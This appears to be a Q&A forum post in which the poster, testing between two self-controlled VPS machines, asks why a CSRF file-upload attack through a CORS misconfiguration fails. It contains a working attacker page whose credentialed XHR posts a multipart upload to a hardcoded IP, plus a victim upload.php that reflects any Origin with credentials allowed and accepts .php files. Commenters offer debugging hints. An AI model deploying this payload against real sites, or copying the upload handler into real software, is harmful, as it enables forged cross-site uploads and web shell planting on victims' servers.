# CSRF fileupload via CORS misconfiguration

Tags: ajax, file-upload, csrf

I'm trouble in CSRF fileupload via CORS misconfiguration.....
This one is my payload ... to upload some files with ajax request ...
i'm tested in two vps ... one consider as victim and one as attacker.

```html
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://165.227.79.228/index.php", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = "true";
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"message\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"backPage\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"dataType\"\r\n" +
          "\r\n" +
          "test  \r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "test3\r\n" +
          "-----------------------------256672629917035--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));

      }
    </script>
    <form action="http://165.227.79.228/index.php">
      <input type="submit" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
```

This one is index.php that hosted in victim machine ...

```html
<!DOCTYPE html>
<html>
<body>

<form action="upload.php" method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload Image" name="submit">
</form>

</body>
</html>
```

This one is upload.php to handle uploaded data.

```html
<?php
$origin=$_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin:' . $origin);
header('Access-Control-Allow-Credentials: true');
$target_dir = "uploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = pathinfo($target_file,PATHINFO_EXTENSION);
if(isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if($check !== false) {
        echo "File is an image - " . $check["mime"] . ".";
        $uploadOk = 1;
    } else {
        echo "File is not an image.";
        $uploadOk = 0;
    }
}
if (file_exists($target_file)) {
    echo "Sorry, file already exists.";
    $uploadOk = 0;
}
if ($_FILES["fileToUpload"]["size"] > 500000) {
    echo "Sorry, your file is too large.";
    $uploadOk = 0;
}
if($imageFileType != "php" && $imageFileType != "txt" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
    echo "Sorry, only PHP, TXT,jpeg files are allowed.";
    $uploadOk = 0;
}
if ($uploadOk == 0) {
    echo "Sorry, your file was not uploaded.";
} else {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded.";
    } else {
        echo "Sorry, there was an error uploading your file.";
    }
}
?>
```

The XHR request is successfully transfer to victim machine but the form is not upload to victim's side . please help me. (I already tried lots of ways but can't solved this ...:-( Sorry my English skills)

Comment: Well you didn't cancel the form submit in order for the ajax request to complete

Comment: Just edit it into the question

Comment: No @Musa i just want to successfully upload txt file on victim side .